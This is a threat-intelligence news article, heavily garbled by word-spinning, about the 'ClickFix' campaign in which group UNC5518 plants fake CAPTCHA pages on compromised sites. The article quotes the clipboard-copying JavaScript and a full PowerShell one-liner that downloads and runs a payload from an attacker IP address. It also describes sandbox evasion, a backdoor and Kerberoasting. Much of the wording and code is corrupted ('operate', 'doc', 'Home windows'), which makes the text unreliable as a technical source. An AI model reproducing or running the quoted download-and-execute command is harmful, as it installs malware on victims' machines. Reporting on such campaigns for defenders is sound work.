A classy cybercrime operation has emerged, concentrating on unsuspecting web customers via a misleading social engineering method that exploits one of many net’s most trusted safety mechanisms.
Since June 2024, the financially motivated menace group UNC5518 has been systematically compromising official web sites to inject malicious faux CAPTCHA verification pages, tricking guests into unknowingly executing malware on their programs.
The assault marketing campaign, dubbed “ClickFix” by safety researchers, represents a very insidious type of social engineering that leverages customers’ familiarity with routine CAPTCHA challenges. When victims encounter these fraudulent verification pages, they’re offered with what seems to be a regular reCAPTCHA interface, full with the acquainted “I’m not a robotic” checkbox and Google branding.
Nevertheless, clicking on this seemingly innocuous factor triggers a malicious JavaScript payload that mechanically copies a PowerShell command to the person’s clipboard.
Google Cloud analysts recognized that UNC5518 operates as an access-as-a-service supplier, partnering with a number of affiliate menace teams to monetize their preliminary compromise capabilities.
The group’s subtle infrastructure helps numerous downstream actors, together with UNC5774, which makes a speciality of deploying the CORNFLAKE.V3 backdoor, and UNC4108, recognized for using PowerShell-based instruments and conducting in depth community reconnaissance.
Assault lifecycle (Supply – Google Cloud)
The technical execution of this assault demonstrates outstanding consideration to element in mimicking official net safety practices.
The malicious JavaScript embedded inside compromised web sites creates a convincing CAPTCHA interface utilizing code that intently resembles genuine Google reCAPTCHA implementations.
When victims work together with the faux verification system, the next code executes silently within the background:-
doc.getElementById(“j”).onclick = operate(){
var ta = doc.createElement(“textarea”);
ta.worth = _0xC;
doc.physique.appendChild(ta);
ta.choose();
doc[.]execCommand(“copy”);
This script mechanically copies a fastidiously crafted PowerShell command to the sufferer’s clipboard, which seems as: powershell -w h -c “$u=[int64](([datetime]::UtcNow-[datetime]’1970-1-1′).TotalSeconds)%0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex”.
The command is designed to obtain and execute further malware payloads from attacker-controlled infrastructure.
An infection Mechanism and Payload Supply
The ClickFix method exploits a essential weak spot in person conduct patterns, capitalizing on the widespread acceptance and belief related to CAPTCHA programs.
As soon as the malicious PowerShell command is copied to the clipboard, victims are usually instructed via on-screen prompts to stick and execute the command utilizing the Home windows Run dialog (Home windows+R), believing they’re finishing a official verification course of.
Upon execution, the PowerShell script initiates a complicated multi-stage an infection chain that features complete anti-analysis measures.
The malware performs setting checks to detect digital machines and sandboxes, analyzing system reminiscence configurations and producer data to evade safety analysis environments.
If these checks cross, the script downloads Node.js runtime parts from official sources and deploys the CORNFLAKE.V3 backdoor, which establishes persistent entry via registry modifications and permits complete system reconnaissance actions together with Lively Listing enumeration and Kerberoasting credential harvesting strategies.
Increase your SOC and assist your workforce shield your enterprise with free top-notch menace intelligence: Request TI Lookup Premium Trial.
